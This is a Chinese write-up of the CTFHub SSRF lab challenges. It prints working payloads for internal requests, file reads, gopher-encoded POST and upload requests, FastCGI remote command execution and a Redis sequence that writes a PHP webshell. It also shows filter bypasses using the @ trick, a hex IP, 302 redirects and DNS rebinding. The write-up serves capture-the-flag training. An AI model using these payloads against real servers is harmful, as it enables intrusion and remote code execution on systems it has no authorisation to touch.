[PHP知识库]CTFHub-SSRF-Writeup

SSRF

内网访问

直接构造访问请求,获取flag

/?url=127.0.0.1/flag.php

伪协议读取文件

根据题目提示使用file://协议，尝试一般web目录/var/www/html/

端口扫描

提示端口范围8000到9000

/?url=127.0.0.1:8000

使用burpsuite对端口进行爆破，即可得到端口，访问获取flag

POST请求

访问/?url=127.0.0.1/flag.ph,返回页面

包含一个form和隐藏的key，推测需要在form中提交key，F12添加提交按钮

<input type="submit" name="sbumit">

在页面上提交key，页面返回"Just View From 127.0.0.1"

可见需要通过SSRF提交请求，构造POST请求

  POST /flag.php HTTP/1.1
  Host: 127.0.0.1:80
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 36

  key=99cb8729f8a7ba5dcaa367dc092c2f2c

因为通过SSRF，需要进行两次请求，所以对请求数据进行2次url编码，注意使用CRLF，第一次url编码后需要将%0A替换为%0D%0A,最后得到请求数据

  POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253D99cb8729f8a7ba5dcaa367dc092c2f2c

使用gopher发送请求，gopher协议是SSRF中常用的一个协议：

gopher://IP:port/_{TCP/IP数据流}

? 得到flag

文件上传

使用file协议查看flag.php，代码检查了上传ip和文件大小，所以需要从127.0.0.1上传非空文件

<?php
error_reporting(0);
if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
  echo "Just View From 127.0.0.1";
  return;
}
if(isset($_FILES["file"]) && $_FILES["file"]["size"] > 0){
  echo getenv("CTFHUB");
  exit;
}
?>
Upload Webshell
<form action="/flag.php" method="post" enctype="multipart/form-data">
  <input type="file" name="file">
</form>

访问/?url=127.0.0.1/flag.php，返回一个文件上传form，根据题意需要提交文件获取flag，F12添加提交按钮

提交一个随意非空文件，抓取上传数据包，修改host为127.0.0.1:80

对上传数据进行二次url编码，注意第一次编码后将%0A替换为%0D%0A，得到编码后的请求数据

POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%2520280%250D%250ACache-Control%253A%2520max-age%253D0%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AOrigin%253A%2520http%253A%252F%252Fchallenge-426ad735267eb08d.sandbox.ctfhub.com%253A10800%250D%250AContent-Type%253A%2520multipart%252Fform-data%253B%2520boundary%253D----WebKitFormBoundaryM9A8PenlAkNIPrWa%250D%250AUser-Agent%253A%2520Mozilla%252F5.0%2520(Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64)%2520AppleWebKit%252F537.36%2520(KHTML%252C%2520like%2520Gecko)%2520Chrome%252F92.0.4515.159%2520Safari%252F537.36%250D%250AAccept%253A%2520text%252Fhtml%252Capplication%252Fxhtml%252Bxml%252Capplication%252Fxml%253Bq%253D0.9%252Cimage%252Favif%252Cimage%252Fwebp%252Cimage%252Fapng%252C*%252F*%253Bq%253D0.8%252Capplication%252Fsigned-exchange%253Bv%253Db3%253Bq%253D0.9%250D%250AReferer%253A%2520http%253A%252F%252Fchallenge-426ad735267eb08d.sandbox.ctfhub.com%253A10800%252F%253Furl%253D127.0.0.1%252Fflag.php%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.9%250D%250ACookie%253A%2520UM_distinctid%253D17b2f471020f2e-06f3628e7e7e6e-4343363-1fa400-17b2f47102110f5%250D%250AConnection%253A%2520close%250D%250A%250D%250A------WebKitFormBoundaryM9A8PenlAkNIPrWa%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%2522123.txt%2522%250D%250AContent-Type%253A%2520text%252Fplain%250D%250A%250D%250A123%250D%250A------WebKitFormBoundaryM9A8PenlAkNIPrWa%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522123%2522%250D%250A%250D%250A%25C3%25A6%25C2%258F%25C2%2590%25C3%25A4%25C2%25BA%25C2%25A4%250D%250A------WebKitFormBoundaryM9A8PenlAkNIPrWa--

使用gopher发送请求，得到flag

FastCGI协议

fastcgi相关介绍
gopher payload工具
使用gopherus工具生成payload，运行命令ls /

进行url编码后得到提交payload

gopher%3A%2F%2F127.0.0.1%3A9000%2F_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2504%2504%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2502CONTENT_LENGTH56%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2517SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Findex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%25008%2504%2500%253C%253Fphp%2520system%2528%2527ls%2520%2F%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500

发送请求，获取/下目录情况,发现flag文件

使用gopherus工具生成payload，运行命令cat /flag_14e0ba551d369f7992793e0b62395dc5

进行url编码后得到提交payload

gopher%3A%2F%2F127.0.0.1%3A9000%2F_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2504%2504%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2502CONTENT_LENGTH94%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2517SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Findex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%255E%2504%2500%253C%253Fphp%2520system%2528%2527cat%2520%2Fflag_14e0ba551d369f7992793e0b62395dc5%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500

发送请求，获得flag

Redis协议

浅析Redis中SSRF的利用
redis写shell命令如下

flushall
set 1 '<?php eval($_GET["feng"]);?>'
config set dir /var/www/html
config set dbfilename feng.php
save

使用gopherus工具生成redis攻击payload

进行url编码得到请求payload

gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252434%250D%250A%250A%250A%253C%253Fphp%2520system%2528%2524_GET%255B%2527cmd%2527%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

请求后生成一句话shell.php文件，利用参数cmd，构造请求/shell.php?cmd=ls%20/

获取flag文件，再构造请求/shell.php?cmd=cat%20/flag_1d41ab57dcc1507d5d99e103cdca52da,获得flag

URL Bypasss

访问地址提示"start with http://notfound.ctfhub.com", 所以需要以http://notfound.ctfhub.com开头，构造访问url如下获取flag

/?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

数字IP Bypass

题目提示ban掉了127以及172.不能使用点分十进制的IP，但是又要访问127.0.0.1

• 方法一：
  使用localhost代替127.0.0.1,构造请求url如下，获取flag

/?url=http://localhost/flag.php

• 方法二:
  将127.0.0.1转换为16进制0x7F000001,构造请求url如下，获取flag

/?url=http://0x7F000001/flag.php

302跳转 Bypass

题目提示过滤了127.0.0.1，使用数字IP Bypass可以绕过，但是题意是使用302跳转绕过，可以生成短链接302跳转获得flag, 短链接生成网站

DNS重绑定

DNS重绑定漏洞
使用file://协议查看flag.php查看代码发现过滤了/127|172|10|192/开头，可以用16进制方式绕过，但是考虑到题目要求使用DNS重绑定
使用rbndr.us dns rebinding service获取域名

访问或取flag